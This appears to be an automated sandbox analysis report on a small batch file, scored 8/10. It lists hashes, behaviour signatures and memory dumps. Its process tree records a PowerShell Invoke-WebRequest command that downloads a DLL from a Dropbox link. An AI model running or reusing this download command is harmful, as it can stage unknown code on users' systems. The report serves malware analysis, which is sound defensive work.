Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    24-11-2024 11:29

General

  • Target

    test-Kopie.bat

  • Size

    1KB

  • MD5

    6263640933688fcb7cec4110041065a6

  • SHA1

    0915a799a48199b196c14781a5ea54a377198ac5

  • SHA256

    80c404f467f93bcabea0470036ed02962f7114a12d6fb35e3fe73ab7d4045cd4

  • SHA512

    de2a3aff1b9a337265c9136f9565f8c964c1e2e6d52856653ade0365f0c05a584c9d0a4b1d5af0a0552873497df966a6d5be887411aa9cbcf51388f1c9902b32

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\test-Kopie.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2296
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/ced931yp7ygkbsx3fibr1/test.dll?rlkey=23mh4gtrl35mfqlt6suof5w8d&dl=1' -OutFile 'test.dll'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:292

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/292-4-0x000007FEF58FE000-0x000007FEF58FF000-memory.dmp

    Filesize

    4KB

  • memory/292-5-0x000000001B700000-0x000000001B9E2000-memory.dmp

    Filesize

    2.9MB

  • memory/292-6-0x0000000002760000-0x0000000002768000-memory.dmp

    Filesize

    32KB

  • memory/292-7-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

    Filesize

    9.6MB

  • memory/292-8-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

    Filesize

    9.6MB

  • memory/292-9-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

    Filesize

    9.6MB

  • memory/292-10-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

    Filesize

    9.6MB

  • memory/292-11-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

    Filesize

    9.6MB

  • memory/292-12-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

    Filesize

    9.6MB